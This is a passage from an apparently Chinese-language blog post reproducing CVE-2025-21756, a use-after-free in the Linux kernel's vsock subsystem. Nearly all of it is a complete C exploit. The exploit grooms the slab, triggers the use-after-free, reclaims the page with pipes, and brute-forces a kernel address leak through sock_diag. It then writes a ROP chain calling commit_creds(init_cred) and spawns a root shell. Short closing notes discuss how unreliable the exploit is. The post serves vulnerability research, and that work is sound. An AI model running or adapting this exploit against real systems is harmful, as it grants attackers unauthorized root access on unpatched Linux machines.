write(pipes[i][1], buf, 0x200);
write(pipes[i][1], &push_rbx_pop_rsp_ret, 8); // stack pivot [sk_error_report()]

Final

最终利用效果如下图所示

Snipaste_2025-06-12_15-33-19

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <fcntl.h>
#include <linux/kernel.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sched.h>
#include <linux/vm_sockets.h>
#include <assert.h>
#include <sys/msg.h>
#include <linux/netlink.h>
#include <linux/vm_sockets_diag.h>
#include <linux/sock_diag.h>
#include <sys/ipc.h>
#include <sys/shm.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <stdint.h>
#include <ctype.h>

#define pause() {write(STDOUT_FILENO, "[*] Paused (press enter to continue)\n", 37); getchar();}
/*
CVE-2025-21756 Exploit
Michael Hoefler
4/18/2025
*/

#define MAX_PORT_RETRIES 24 /* net/vmw_vsock/af_vsock.c */
#define VMADDR_CID_NONEXISTING 42

// PINGv6
#define OBJS_PER_SLAB 12
#define CPU_PARTIAL 24
#define FLUSH ((OBJS_PER_SLAB) * (CPU_PARTIAL + 1))
#define PRE (OBJS_PER_SLAB - 1) * 10
#define POST (OBJS_PER_SLAB + 1) * 10

#define SIZE 1280
#define SPRAY_SIZE 1200
#define NUM_PIPES 500

#define BUFFER_SIZE 8192

#define PAGE_SIZE 4096

/* Create socket <type>, bind to <cid, port> and return the file descriptor. */
int vsock_bind(unsigned int cid, unsigned int port, int type)
{
struct sockaddr_vm sa = {
.svm_family = AF_VSOCK,
.svm_cid = cid,
.svm_port = port,
};
int fd;

fd = socket(AF_VSOCK, type, 0);
if (fd < 0) {
perror("socket");
exit(EXIT_FAILURE);
}

if (bind(fd, (struct sockaddr *)&sa, sizeof(sa))) {
perror("bind");
exit(EXIT_FAILURE);
}

return fd;
}

// this is a universal function to print binary data from a char* array
void print_binary(void *addr, int len)
{
size_t *buf64 = (size_t *) addr;
char *buf8 = (char *) addr;
for (int i = 0; i < len / 8; i += 2) {
printf(" %04x", i * 8);
for (int j = 0; j < 2; j++) {
i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf(" ");
}
printf(" ");
for (int j = 0; j < 16 && j + i * 8 < len; j++) {
printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
}
puts("");
}
}

// 解析内核返回的套接字信息
static void parse_diag_response(char *buf, int len) {
struct nlmsghdr *nlh;

for (nlh = (struct nlmsghdr *)buf; NLMSG_OK(nlh, len); nlh = NLMSG_NEXT(nlh, len)) {
if (nlh->nlmsg_type == NLMSG_ERROR) {
fprintf(stderr, "Netlink error\n");
exit(EXIT_FAILURE);
}

if (nlh->nlmsg_type == NLMSG_DONE)
break;

// 提取套接字诊断信息
struct vsock_diag_msg *diag = NLMSG_DATA(nlh);
printf("vsock_diag_msg content:\
\n state=%u, ino=%u,\n src_cid=0x%x, src_port=0x%x,\
\n dst_cid=0x%x, dst_port=0x%x\n",
diag->vdiag_state,
diag->vdiag_ino,
diag->vdiag_src_cid,
diag->vdiag_src_port,
diag->vdiag_dst_cid,
diag->vdiag_dst_port);
}
}

// get a shell
void get_shell(void){
puts("[*] Returned to userland");
if (getuid() == 0){
printf("[*] UID: %d, got root!\n", getuid());
__asm__(
"pop rdi;"
);
system("/bin/sh");
} else {
printf("[!] UID: %d, didn't get root\n", getuid());
exit(-1);
}
}

long get_user_rsp() {
long rsp;
__asm__ volatile("mov %%rsp, %0" : "=r"(rsp));
return rsp;
}

static int query_flag = 0;
int query_vsock_diag() {
int sock;
struct sockaddr_nl sa;
struct nlmsghdr *nlh;
struct vsock_diag_req req;
char buffer[BUFFER_SIZE];

// Create Netlink socket
sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG);
if (sock < 0) {
perror("socket");
exit(-1);
}

memset(&sa, 0, sizeof(sa));
sa.nl_family = AF_NETLINK;

// Prepare Netlink message
memset(&req, 0, sizeof(req));
req.sdiag_family = AF_VSOCK;
req.vdiag_states = (1 << 2);

nlh = (struct nlmsghdr *)buffer;
nlh->nlmsg_len = NLMSG_LENGTH(sizeof(req));
nlh->nlmsg_type = SOCK_DIAG_BY_FAMILY;
nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_DUMP;
nlh->nlmsg_seq = 1;
nlh->nlmsg_pid = getpid();

memcpy(NLMSG_DATA(nlh), &req, sizeof(req));

// Send request
//printf("sock: %d\n", sock);
if (sendto(sock, nlh, nlh->nlmsg_len, 0, (struct sockaddr *)&sa, sizeof(sa)) < 0) {
perror("ERROR: sendto");
close(sock);
exit(-1);
}

// Receive response
ssize_t len = recv(sock, buffer, sizeof(buffer), 0);
if (len < 0) {
perror("ERROR: recv");
close(sock);
exit(-1);
}
if (!query_flag++) {
puts("[+]-------------------------------------------[+]");
print_binary(buffer, len);
parse_diag_response(buffer, len);
puts("[+]-------------------------------------------[+]");
}
close(sock);
return len;
}

void pin_cpu(int cpu) {
cpu_set_t set;
CPU_ZERO(&set);
CPU_SET(cpu, &set);
if (sched_setaffinity(0, sizeof(set), &set) == -1) {
perror("sched_setaffinity");
exit(1);
}
}

size_t user_cs, user_ss, user_rsp, user_rflags;
void save_status(void)
{
__asm__(
"mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_rsp, rsp;"
"pushf;"
"pop user_rflags;"
);
puts("[*] successful save status");
}

int main(void) {

int sockets[MAX_PORT_RETRIES];
struct sockaddr_vm addr;
int s, i, alen;

printf(
" _ \n"
" | | \n"
" __ _____ ___ ___| | ___ ____ ___ __ \n"
" \\ \\ / / __|/ _ \\ / __| |/ / '_ \\ \\ /\\ / / '_ \\ \n"
" \\ V /\\__ \\ (_) | (__| <| |_) \\ V V /| | | |\n"
" \\_/ |___/\\___/ \\___|_|\\_\\ .__/ \\_/\\_/ |_| |_|\n"
" | | \n"
" |_| \n");

puts("[+] pinning to cpu0");
pin_cpu(0);

save_status();

puts("[+] alloc enough sockets and prepare bind table");

int junk[FLUSH];
for (int i = 0; i < FLUSH; i++)
junk[i] = socket(AF_VSOCK, SOCK_SEQPACKET, 0);

s = vsock_bind(VMADDR_CID_LOCAL, VMADDR_PORT_ANY, SOCK_SEQPACKET);

alen = sizeof(addr);
if (getsockname(s, (struct sockaddr *)&addr, &alen)) {
perror("getsockname");
exit(EXIT_FAILURE);
}

struct sockaddr_vm sa = {
.svm_family = AF_VSOCK,
.svm_cid = VMADDR_CID_LOCAL,
.svm_port = addr.svm_port,
};

for (i = 0; i < MAX_PORT_RETRIES; ++i) {
sa.svm_port = ++addr.svm_port;
if (bind(junk[i], (struct sockaddr *)&sa, sizeof(sa))) {
perror("bind");
exit(EXIT_FAILURE);
}
}

close(s);

puts("[+] pre alloc sockets");

int pre[PRE];
for (int i = 0; i < PRE; i++)
pre[i] = socket(AF_VSOCK, SOCK_SEQPACKET, 0);

puts("[+] alloc target");
s = socket(AF_VSOCK, SOCK_STREAM, 0);
if (s < 0) {
perror("socket");
exit(EXIT_FAILURE);
}

// testing
puts("[+] post-alloc objects");
int post[POST];
for (int i = 0; i < POST; i++)
post[i] = socket(AF_VSOCK, SOCK_SEQPACKET, 0);


puts("[+] trigger uaf");
if (!connect(s, (struct sockaddr *)&addr, alen)) {
fprintf(stderr, "Unexpected connect() #1 success\n");
exit(EXIT_FAILURE);
}
// connect() #1 failed: transport set, sk in unbound list.

addr.svm_cid = VMADDR_CID_NONEXISTING;
addr.svm_port = VMADDR_PORT_ANY;
if (!connect(s, (struct sockaddr *)&addr, alen)) {
fprintf(stderr, "Unexpected connect() #2 success\n");
exit(EXIT_FAILURE);
}
// connect() #2 failed: transport unset, sk ref dropped?

// wait for input
puts("[+] uaf finished!..");


puts("[+] fill up the cpu partial list");
for (int i = 4; i < FLUSH; i += OBJS_PER_SLAB)
close(junk[i]);

puts("[+] free all the pre/post alloc-ed objects");
for (int i = 0; i < POST; i++)
close(post[i]);
for (int i = 0; i < PRE; i++)
close(pre[i]);

puts("[+] close the junk bound sockets");
for (int i = 0; i < FLUSH; i++)
close(junk[i]);

sleep(3);

int pipes[NUM_PIPES][2];
char page[PAGE_SIZE];
memset(page, 2, PAGE_SIZE);

puts("[+] reclaim page");
pause(); // debug final epxloit

int w = 0;
int j;
i = 0;
while (1) { // TODO: i < NUM_PIPES, improve stability

sleep(0.1);

if (pipe(&pipes[i][0]) < 0) {
perror("pipe");
break;
}

w = 0;
while (w < PAGE_SIZE) {
ssize_t written = write(pipes[i][1], page, 8);
j = query_vsock_diag();
w += written;
if (j != 48) goto out;
}
printf(".");
fflush(stdout);
i++;
if (i % 32 == 0) puts("");
}

out:

printf("\n[+] found init_net at i=%d and w=%d\n", i, w);

//long base = 0xffffffff84bb0000; // probably need to change for aslr
long base = 0xffffffff84bb1000; // probably need to change for aslr
long off = 0;
long addy;
printf("[+] attempting net overwrite (aslr bypass).\n");

while (off < 0xffffffff) {

// release the page of vsk
close(pipes[i][0]);
close(pipes[i][1]);

if (pipe(&pipes[i][0]) < 0) {
perror("pipe");
}

addy = base + off;

write(pipes[i][1], page, w - 8);
write(pipes[i][1], &addy, 8); //position of sock_net(sk)

if (off % 256 == 0) {
printf("+");
fflush(stdout);
}

j = query_vsock_diag();
if (j == 48) {
printf("\n[*] LEAK init_net @ 0x%lx\n", base + off);
goto out2;
}

off += 128; // TODO: modify for aslr?

}

out2:

long kern_base = base + off - 0x3bb1f80;
printf("[*] leaked kernel base @ 0x%lx\n", kern_base);

// calculate some rop gadgets
long ret = kern_base + 0x15e920 + 1;
// 0xffffffff8115e91f : pop r15 ; ret
long pop_r15_ret = kern_base + 0x15e91f;
// 0xffffffff8115e920 : pop rdi ; ret
long pop_rdi_ret = kern_base + 0x15e920;

// long raw_proto_abort = kern_base + 0x2efa8c0;
long raw_proto = kern_base + 0x2ef2400; // actually is raw_prot in kallsyms
long raw_proto_abort = raw_proto + 0x1c0; // the offset of raw_prot->diag_destroy(raw_abort)

// long null_ptr = kern_base + 0x2eeaee0;
long null_ptr = raw_proto + 0x10; // obtained from raw_prot struct


// 0xffffffff82c2a8ed: push rdi; pop rsp; cmp dword ptr [rax - 0x74bf5df6], 0x66b06741; ret;
// long push_rbx_pop_rsp_ret = kern_base + 0x6b9529;
long push_rbx_pop_rsp_ret = kern_base + 0xcbb984;
// replace `push rdi` with `push rbx` which I dont find in my kernel & rdi = rbx
long push_rdi_pop_rsp_ret = kern_base + 0x1c2a8ed;


long init_cred = kern_base + 0x2c74d80;
long commit_creds = kern_base + 0x1fcca0;
// return to user mode
// long swapgs_restore_regs_and_return_to_usermode = kern_base + 0x16011a6;
long swapgs_restore_regs_and_return_to_usermode = kern_base + 0x1601170 + 54; // 54 means begin with mov rdi,rsp

// info for returning to usermode
// long user_cs = 0x33;
// long user_ss = 0x2b;
// long user_rflags = 0x202;
long shell = (long)get_shell;

// uint64_t* user_rsp = (uint64_t*)get_user_rsp();

//getchar();

printf("[+] writing the rop chain\n");

close(pipes[i][0]);
close(pipes[i][1]);

if (pipe(&pipes[i][0]) < 0) {
perror("pipe");
}

printf("[+] writing payload to vsk\n");
write(pipes[i][1], page, w - 56);

char buf[0x330];
memset(buf, 'A', 0x330);
char not[0x330];
memset(not, 0, 0x330);

// create the rop chain!
long deadbuf = 0;
write(pipes[i][1], &deadbuf, 8);
write(pipes[i][1], &deadbuf, 8);
write(pipes[i][1], &deadbuf, 8);
write(pipes[i][1], &deadbuf, 8);

write(pipes[i][1], &pop_r15_ret, 8); // junk
write(pipes[i][1], &raw_proto_abort, 8); // sk_prot (calls sk->sk_error_report())
write(pipes[i][1], &ret, 8);

// totoally add 0x18 data so dont need `write(pipes[i][1], buf, 0x18);`
write(pipes[i][1], &pop_rdi_ret, 8); // stack pivot target
write(pipes[i][1], &init_cred, 8);
write(pipes[i][1], &ret, 8);
// write(pipes[i][1], &ret, 8);

write(pipes[i][1], &commit_creds, 8); // commit_creds(init_cred);
write(pipes[i][1], &swapgs_restore_regs_and_return_to_usermode, 8);
write(pipes[i][1], &null_ptr, 8); // rax
write(pipes[i][1], &null_ptr, 8); // rdi
write(pipes[i][1], &shell, 8); // rip
write(pipes[i][1], &user_cs, 8);
write(pipes[i][1], &user_rflags, 8);
write(pipes[i][1], &user_rsp, 8); // rsp
write(pipes[i][1], &user_ss, 8);
// write(pipes[i][1], buf, 0x18);
write(pipes[i][1], &not, 8); // sk_lock
write(pipes[i][1], &not, 8); // sk_lock
write(pipes[i][1], &null_ptr, 8); // sk_lock
write(pipes[i][1], &null_ptr, 8); // sk_lock
write(pipes[i][1], buf, 0x200);
write(pipes[i][1], &push_rbx_pop_rsp_ret, 8); // stack pivot [sk_error_report()]
// write(pipes[i][1], &push_rdi_pop_rsp_ret, 8); // stack pivot [sk_error_report()]
//getchar();

close(s); // trigger the exploit!

}

Notion

关于漏洞利用部分有一些需要注意的点

  • POC 成功需要大量的页释放和回收命中操作,使得成功率较低
  • 同时原文中所提出的爆破地址,个人看来也仅局限于不开随机化的情况,因为在开启随机化的同时也意味着爆破的次数增加,这使得导致对页命中的要求更高了,从而提前导致内核崩溃
  • Title: CVE-2025-21756 漏洞复现及利用
  • Author: henry
  • Created at : 2025-06-13 11:46:57
  • Updated at : 2025-06-13 12:00:04
  • Link: https://henrymartin262.github.io/2025/06/13/CVE-2025-21756/
  • License: This work is licensed under CC BY-NC-SA 4.0.
 Comments